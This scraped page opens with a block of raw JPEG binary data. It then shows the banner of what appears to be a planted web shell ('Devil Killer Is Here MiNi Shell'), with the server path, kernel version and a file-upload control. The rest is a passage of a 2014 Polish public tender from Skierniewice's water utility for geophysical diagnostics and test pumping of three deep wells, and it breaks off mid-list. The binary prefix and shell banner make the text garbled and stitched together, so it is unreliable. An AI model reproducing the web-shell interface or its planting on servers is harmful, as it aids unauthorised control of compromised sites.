JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140613/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140613/200906-N-2014.html

<p class="kh_header"><b>Skierniewice: Diagnostyka 3 otworów studziennych, poprzez przeprowadzenie badań geofizycznych oraz krótkotrwałych pompowań pomiarowych, w celu ustalenia aktualnej wydajności  eksploatacyjnej, realizowana w ramach projektu pn. Wykonanie robót geologicznych dla ustalenia zasobów eksploatacyjnych wielootworowego ujęcia wód podziemnych ujmującego dolnokredowy poziom wodonośny w rejonie ul. Rawskiej w Skierniewicach - zadanie I</b><br>
<b>Numer ogłoszenia: 200906 - 2014; data zamieszczenia: 13.06.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Wodociągów i Kanalizacji "WOD-KAN" Sp. z o.o. , Mokra Prawa 30, 96-100 Skierniewice, woj. łódzkie, tel. 046 8333808, faks 046 8334668.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wodkan-skierniewice.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Diagnostyka 3 otworów studziennych, poprzez przeprowadzenie badań geofizycznych oraz krótkotrwałych pompowań pomiarowych, w celu ustalenia aktualnej wydajności  eksploatacyjnej, realizowana w ramach projektu pn. Wykonanie robót geologicznych dla ustalenia zasobów eksploatacyjnych wielootworowego ujęcia wód podziemnych ujmującego dolnokredowy poziom wodonośny w rejonie ul. Rawskiej w Skierniewicach - zadanie I.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> - Przedmiot zamówienia dotyczy: Diagnostyki 3 otworów studziennych, poprzez przeprowadzenie badań geofizycznych oraz krótkotrwałych pompowań pomiarowych, w celu ustalenia aktualnej wydajności  eksploatacyjnej, realizowanej w ramach projektu pn. Wykonanie robót geologicznych dla ustalenia zasobów eksploatacyjnych wielootworowego ujęcia wód podziemnych ujmującego dolnokredowy poziom wodonośny w rejonie ul. Rawskiej w Skierniewicac - zadanie I
I.AKTUALNY STAN TECHNICZNY UJĘCIA
Ujęcie, wybudowane w latach 1985 -1991, składa się z czterech otworów studziennych ujmujących poziom wodonośny kredy dolnej, rozmieszczonych liniowo wzdłuż ulicy Rawskiej:
- otwór nr I1 z uwagi na istniejący zasyp całej rury filtrowej i błędy wykonawcze nie nadaje się do rekonstrukcji i przewiduje się jego likwidację - prace związane z tym otworem nie wchodzą w zakres zamówienia.
-otwór nr I2 wykonany w 1987 r., głębokość 600 m, wydajność eksploatacyjna 210m3 na h;
- otwór nr I3 wykonany w 1990 r., głębokość 590 m, wydajność eksploatacyjna  210 m3 na h;
- otwór nr I4 wykonany w 1991 r., głębokość 590 m, wydajność eksploatacyjna 210 m3 na h.
Z uwagi na fakt, że od wykonania odwiertów minęło ponad 20 lat i nigdy nie zostały one podłączone do eksploatacji, przed podjęciem decyzji co do dalszych losów ujęcia, ZWiK w Skierniewicach podjął działania mające na celu ustalenie aktualnego stanu technicznego poszczególnych otworów i ocenę możliwości włączenia ich do miejskiej sieci wodociągowej. W tym celu, przed przystąpieniem do bardziej szczegółowych badań diagnostycznych otworów, w marcu 2013 r. wykonano wstępną diagnostykę ich stanu technicznego metodą kamerowania. Wyniki badań przedstawiono w formie opinii stanu technicznego studni, która stanowi integralną część niniejszego opisu - (Zał. Nr 1A SIWZ).
 W trakcie inspekcji kamerą ustalono aktualną drożność otworów, stopień skorodowania oraz kolmatacji rur osłonowych i kolumny filtrowej w zakresie możliwym do ustalenia tą metodą, zweryfikowano głębokość posadowienia kolumny filtrowej podaną w kartach otworów. Dodatkowo pomierzono głębokość położenia statycznego lustra wody w otworach. 
Na podstawie wykonanego kamerowania stwierdzono, że stan techniczny otworów I3 i I4 jest dobry i po ich oczyszczeniu możliwe jest uzyskanie pierwotnych wydajności eksploatacyjnych. Stan techniczny otworu I2 nie jest do końca rozpoznany ponieważ nie sprawdzono jego drożności do samego dna. Z dużym prawdopodobieństwem można jednak zakładać, że tak jak w przypadku ww. otworów również ten otwór jest w dobrym stanie technicznym i po oczyszczeniu możliwe będzie przywrócenie go do pierwotnej sprawności. 
Szczegółowe informacje dot. lokalizacji ujęcia, stanu technicznego ujęcia, dotychczasowych badań hydrogeologicznych, budowy geologicznej i warunków hydrogeologicznych zawarte są w Projekcie robót geologicznych dla ustalenia zasobów eksploatacyjnych wielootworowego ujęcia wód podziemnych ujmującego dolnokredowy poziom wodonośny w rejonie ulicy Rawskiej w SKIERNIEWICACH oprac. przez HYDROEKO - Biuro Poszukiwań i Ochrony Wód Andrzej Rodzoch 02-796 Warszawa, ul. Wąwozowa 25 lok. 48,  w styczniu 2014 r., - (zał. Nr 1 B SIWZ) zatwierdzonego Decyzją Marszałka Województwa Łódzkiego z dnia 12.03.2014 r., znak RŚV 7430 2 2014 BC, który stanowi integralną część niniejszego opisu - (zał. Nr 1 C SIWZ).
II. BADANIA DIAGNOSTYCZNE PLANOWANE DO WYKONANIA
Ponieważ wykonane kamerowanie otworów nie może dać pełnej odpowiedzi na temat ich aktualnego stanu technicznego, zaplanowano wykonanie dodatkowych badań diagnostycznych obejmujących:
1) wykonanie kompleksowej diagnostyki stanu technicznego otworów I2, I3 i I4 metodami geofizycznymi (geofizyki otworowej);
2) ustalenie aktualnej wydajności jednostkowej i sprawności hydraulicznej otworów  I2, I3 i I4 metodą krótkotrwałych, pojedynczych pompowań pomiarowych.
Wyżej wymienione badania winny być wykonane jednocześnie, w tym samym czasie w okresie 15 września - 31 października 2014 r., z wyjątkiem działki nr 128, na której prace należy zakończyć do 15.10.2014 r., zgodnie z porozumieniami zawartymi z właścicielami nieruchomości, na których zlokalizowane są otwory studzienne (porozumienia załączone do Projektu robót geologicznych), oraz na których ma być ułożony rurociąg do odprowadzenia wody z pompowania otworów (porozumienia zostaną przekazane wybranemu wykonawcy po zawarciu umowy).
Zakres zadania obejmuje wykonanie następujących  prac:
1.Prace przygotowawcze  w tym:
1.1.  Prace przygotowawcze pod ułożenie rurociągów: wycinka drzew i krzewów
1 Wycinkę drzew i krzewów należy wykonać w oparciu o  Inwentaryzacją drzew i krzewów znajdujących się na trasie projektowanych tymczasowych rurociągów tłocznych do odprowadzenia wody z pompowania studni głębinowych do rowu melioracyjnego oraz w otoczeniu istniejących otworów studziennych opracowaną przez Biuro Ekoinżynierii  BeTeS w Skierniewicach - zał. Nr 1 D SIWZ, z wyjątkiem działek:
- nr ewid. 679, na której należy pozostawić wszystkie krzewy dzikiej róży, w związku z tym rurociąg na tej działce należy ułożyć w sposób nie kolidujący z istniejącymi krzewami;
- nr ewid. 683, na której zamawiający wykona wycinkę we własnym zakresie.
2)Wykonawca poinformuje Zamawiającego o terminie wejścia na poszczególne działki w celu rozpoczęcia wycinki drzew, za pomocą fax lub pisemnie w terminie 3 dni przed wejściem na teren danej działki.
3)Wykonawca powiadomi pisemne właścicieli gruntów, z wyprzedzeniem 14 -dniowym o zamierzonym terminie wejścia na teren nieruchomości, w celu wykonania  wycinki drzew i krzewów oraz planowanym terminie zejścia po ich  uporządkowaniu. 
4) Wykonawca uporządkuje teren po wycince drzew i krzewów. Drewno z wycinki należy przekazać właścicielowi gruntu lub w przypadku braku jego zgody na odbiór drewna, usunąć z działki na własny koszt.
5) Zamawiający przekaże Wykonawcy następujące dokumenty po podpisaniu umowy:
- zgodę właścicieli działek o nr ewid. 671, 669, 673 i 675 na wycinkę drzew samosiewów oraz samosiewów krzewów, których wiek nie przekracza 10 lat;
- zgody właścicieli działek na wejście na teren nieruchomości, w celu przeprowadzenia prac;
- zgłoszenie zamiaru wykonania robót budowlanych  polegających na budowie tymczasowych rurociągów tłocznych w celu wykonania próbnego pompowania 3 studni głębinowych  położonych w rejonie ul. Rawskiej w Skierniewicach - z dnia 28.01.2014 r.
1.2. Wyczyszczenie rowu melioracyjnego  w celu udrożnienia oraz odmulenie stawu na terenie Rodzinnego Ogrodu działkowego, przez które będzie odprowadzana woda z próbnego pompowania wody z otworu studziennego nr I4:
- udrożnienie rowu melioracyjnego o szerokości dna rowu 60 cm, poprzez odmulenie z ok. 30 cm osadów na  odcinku  50 mb  od stawu w górę biegu rowu,  wykoszenie traw i trzcin ze skarp;
- odmulenie przepustu  O 60 cm , dł. 10 mb., zamulenie  ok. dwóch trzecich O;
- odmulenie dna stawu na odcinku 30 m, o łącznej długości brzegów stawu   80 m, na szerokość dna 2m od brzegu, zamulenie ok. 30 cm, z wykoszeniem traw i trzcin;
- rozplantowanie ziemi z zamulenia stawu na brzegu skarpy - na ok. 80 mb.,
- odkopanie i zlikwidowanie przecieków przy piętrzeniu wody  np. folia, beton na odcinku 2 mb.
Ww prace należy wykonać przed rozpoczęciem pompowania wody, aby zapewnić swobodny przepływ wody. Zaleca się, aby prace te wykonać ręcznie lub w inny sposób uzgodniony z zarządem Rodzinnego Ogrodu działkowego im. F. Kotowskiego, na którym zlokalizowany jest rów i staw.
Wykonawca obowiązany jest powiadomić zarząd Rodzinnego Ogrodu Działkowego o planowanym terminie rozpoczęcia prac - z wyprzedzeniem 7 dniowym.
1.3. Ułożenie tymczasowych rurociągów tłocznych odprowadzających wodę z pompowania 3 otworów, poprzez rów do zalewu na rzece Łupi .
Rurociągi należy wykonać zgodnie z dokumentacją pn. Budowa tymczasowych rurociągów tłocznych w celu wykonania próbnego pompowania studni głębinowych położonych w rejonie ul. Rawskiej w Skierniewicach, oprac. w ZWiK WOD-KAN Sp. z o.o.  przez mgr inż. Piotra Dąbrowskiego, w styczniu 2013 r. założoną w projekcie średnicę rurociągu tłocznego O 280 mm o dł. 85 mb. zmienia się na O 200 mm - zał. Nr 1 E SIWZ oraz Projektem zam. - rys. nr 1, oprac. w ZWiK WOD-KAN sp. z o.o. w sierpniu 2013 r. - zał. Nr 1 F SIWZ, które stanową integralną część niniejszego opisu.
Łączna długość rurociągów tłocznych wynosi 905 mb, PE 200 mm,  PE-100, PN 10, SDR 17. Rurociągi będą ułożone na powierzchni terenu, po terenie nieutwardzonym, stanowiącym grunty rolnicze i nieużytki porośnięte częściowo drzewami i krzewami. Zakup rurociągu leży po stronie Wykonawcy.
W zakres prac wchodzi umocnienie dna oraz bocznych ścian rowu melioracyjnego na dł. 5 mb. - w miejscu zrzutu wody  z pompowania otworu studziennego nr I4 oraz z otworów  nr I2 i I3.
2. Terenowe prace badawcze diagnostyka otworów
2.1.     Diagnostyka stanu technicznego otworów I2, I3 i I4 metodami geofizycznymi geofizyki otworowej.
Profilowanie  geofizyczne otworów planuje się wykonać dla uszczegółowienia oceny ich stanu technicznego, w tym w szczególności tych elementów, których nie można lub też nie udało się rozpoznać kamerowaniem. Zadaniem tych badań jest:
ustalenie głębokości otworu I2 oraz wysokości ewentualnego zasypu;
ocena prawidłowości położenia rur w odwiercie;
ocena geometrii rur i możliwych uszkodzeń orurowania;
ocena grubości ścian rur stalowych kolumny osłonowej i stopnia ich skorodowania;
identyfikacja większych miejsc ewentualnych nieszczelności orurowania (przecieku wody);
ocena  stanu zacementowania (uszczelnienia) kolumny osłonowej;
ocena wypełnienia przestrzeni pierścieniowej na odcinku rury nadfiltrowej,  identyfikacja braku lub niewystarczającego wypełnienia;
ocena obecności i stanu obsypki żwirowej;
ocena wielkości i rozkładu dopływu wody w obrębie części czynnej kolumny filtrowej w stanie bez eksploatacji i przy pompowaniu z określoną wydajnością;
profilowanie temperatury i przewodności elektrolitycznej właściwej wód dopływających do filtra w czasie spoczynku i przy pompowaniu otworu.
Szczegółowy opis zakresu i sposobu wykonania pompowań zawarty jest w Projekcie robót geologicznych - zał. Nr 1 B SIWZ.
Wyniki wykonanych badań wraz z wnioskami zostaną przedstawione przez Wykonawcę w sprawozdaniu, które zostanie dołączone jako załącznik do sprawozdania końcowego z wykonanych prac diagnostycznych, przygotowanego przez geologa nadzorującego realizację zadania.
2.2	Krótkotrwałe pompowanie pomiarowe dla oceny parametrów hydraulicznych otworów I2, I3 i I4,  poprzedzone kilkugodzinnym pompowaniem oczyszczającym otworów.
Do zadań Wykonawcy należy tylko techniczne wykonanie pompowania w sposób zgodny z Projektem robót geologicznych - zał. Nr 1B SIWZ, w ścisłej współpracy i pod nadzorem hydrogeologa wskazanego przez Zamawiającego. Prowadzenie pomiarów i badań w otworach studziennych objętych diagnostyką  i tych wytypowanych do obserwacji oraz interpretacja wyników pompowań i sporządzenie sprawozdania z realizacji tych prac należy do obowiązków nadzoru geologicznego, wybranego przez Zamawiającego, a nie do Wykonawcy.
 Pompowanie to składa się z dwóch nw. etapów: 
a) Pompowania oczyszczające
Przed wykonaniem pompowania diagnostycznego, każdy otwór należy przepompować przez kilka godzin w celu uzyskania pełnej klarowności wody i uzyskania wstępnych informacji o dopływie wody do otworu. Wydajność pompowania należy zwiększać stopniowo aż do wartości bliskiej maksymalnej - 200 m3na h i prowadzić pompowanie aż do uzyskania pełnej klarowności pompowanej wody.
b) Pompowania diagnostyczne
Diagnostyczne pompowanie pomiarowe dla oceny parametrów hydraulicznych studni należy przeprowadzić dla  wszystkich 3 studni metodą wielokrotnych pompowań jednostopniowych. Celem pompowań jest ustalenie dla każdego z otworów: wydatku krytycznego studni, współczynnika oporu warstwy, współczynnika oporu studni, sprawności studni oraz wielkości zeskoku depresji i ostatecznie optymalnego wydatku studni z technicznego punktu widzenia.
Przygotowując się do wykonania pompowań diagnostycznych, Wykonawca musi uwzględnić następujące wymagania:
 ilość stopni pompowania - co najmniej 4;
pompowanie należy rozpocząć po stwierdzeniu pełnego ustabilizowania się zwierciadła wody w otworze po zakończeniu pompowania oczyszczającego;
łączny czas trwania pompowania diagnostycznego w jednym otworze studziennym - około 12-15 godzin;
maksymalny wydatek pompowania na ostatnim stopniu - około 200 m3 na h; 
do pomiaru natężenia wypływu wody należy zastosować wodomierz zainstalowany na rurociągu odprowadzającym;
pompowana woda będzie odprowadzana rurociągami do rowu melioracyjnego, w sposób opisany w pkt. II.1.3.;
z uwagi na brak linii energetycznych w bezpośrednim sąsiedztwie studni ujęcia, Wykonawca musi zaopatrzyć się we własne źródło energii.
Szczegółowy opis zakresu i sposobu wykonania pompowań zawarty jest w Projekcie robót geologicznych - zał. Nr 1 B SIWZ,  który stanowi integralną część niniejszego opisu.
Dodatkowe obowiązki Wykonawcy dla realizacji zakresu opisanego w pkt II:
a) Powiadomienie zarządcy rowu melioracyjnego (Wojewódzkiego Zarząd Melioracji i Urządzeń Wodnych w Łodzi Terenowego Inspektoratu w Rawie Maz.) o zamierzonym odprowadzeniu wody z pompowań otworów studziennych do rowu.
b) Powiadomienie pisemne właścicieli gruntów, z 14-dniowym wyprzedzeniem, o zamierzonym terminie wejścia na teren nieruchomości w celu wykonania prac oraz planowanym terminie zejścia po ich zakończeniu. 
c) Po zakończeniu wszystkich prac, do obowiązków Wykonawcy należy:
szczelne zamknięcie otworów, w sposób uniemożliwiający zdjęcie kołpaków ochronnych;
zdemontowanie rurociągów;
uporządkowanie terenu prac i doprowadzenie go do stanu sprzed rozpoczęcia prac;
doprowadzenie rowu melioracyjnego w miejscach odprowadzenia wód z pompowania, do stanu sprzed rozpoczęcia prac;
 przedstawienie Zamawiającemu protokołów odbioru terenu przez właścicieli nieruchomości, stwierdzających należyte uporządkowanie terenu i brak roszczeń (Zamawiający udostępni  wybranemu Wykonawcy pisemne zgody właścicieli działek na wejście  na  teren ich nieruchomości w celu  prowadzenia ww prac).
Zgodnie z art. 3 pkt. 32 ustawy o odpadach ( Dz. U. z 08 stycznia 2014 r. poz. 21) Wykonawca świadczący ww usługę jest wytwórcą odpadów powstałych podczas prac objętych przedmiotem zamówienia. Zatem wykonujący usługę jest posiadaczem wytworzonych odpadów i odpowiada za gospodarowanie wytworzonymi przez siebie odpadami zgodnie z obowiązującymi przepisami.
Uwaga: Załączniki od nr 1A do nr 1F są zapisane w oddzielnym folderze (dotyczy SIWZ zamieszczonej  na stronie internetowej).
Uwaga: Termin wykonania zamówienia ustala się w okresie od 01.09.2014r. do 31.10.2014r.
Realizację prac należy prowadzić z uwzględnieniem następujących warunków:
-	w okresie 1-15 września 2014 r. można prowadzić jedynie prace przygotowawcze związane z udrożnieniem rowu i stawu - opisane w rozdz. 3 pkt. II.1.2.  SIWZ
- pozostałe prace (wraz ze sprawozdaniem zawierającym wyniki wykonanych badań diagnostycznych oraz wnioskami - rozdz. 3 pkt. II. 2.1. SIWZ) - w okresie od 15 września do 31 października 2014 r., z wyjątkiem działki nr 128, na której prace należy zakończyć do 15.10.2014r..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.35.50.00-1, 71.35.52.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.09.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca przystępując do przetargu jest obowiązany wnieść wadium w wysokości: 4 000,00 zł ( słownie złotych: cztery tysiące  00/100)
Wadium może być wnoszone w jednej lub kilku następujących formach:
-	 pieniądzu;
-   poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo kredytowej,  z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
-  gwarancjach bankowych;
-  gwarancjach ubezpieczeniowych;
-  poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust.5 pkt 2  ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości ( Dz. U. z 2007r Nr 42, poz.275).</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  nie będzie wymagał wykazania się spełnianiem tego warunku w sposób szczególny tj. warunek ten Zamawiający uzna za spełniony, jeżeli Wykonawca złoży oświadczenie stanowiące zał. nr 4 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli Wykonawca wykaże się wykonaniem w okresie ostatnich trzech lat  przed upływem terminu składania ofert ( a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie) co najmniej 1 pompowania  otworów studziennych, rekonstrukcji lub usprawnień studni o wydajności co najmniej 150 m3/h. Zamawiający dokona oceny spełniania warunku na podstawie analizy treści dokumentów i oświadczenia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  nie będzie wymagał wykazania się spełnianiem tego warunku w sposób szczególny tj. warunek ten Zamawiający uzna za spełniony, jeżeli Wykonawca złoży oświadczenie stanowiące zał. nr 4 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli Wykonawca wykaże się dysponowaniem osobami posiadającymi uprawnienia wynikające z obowiązujących przepisów, w tym Prawa geologicznego i górniczego do kierowania i wykonywania prac objętych zamówieniem.
Zamawiający dokona oceny spełniania warunku na podstawie analizy treści dokumentów i oświadczenia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  nie będzie wymagał wykazania się spełnianiem tego warunku w sposób szczególny tj. warunek ten Zamawiający uzna za spełniony, jeżeli Wykonawca złoży oświadczenie stanowiące zał. nr 4 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
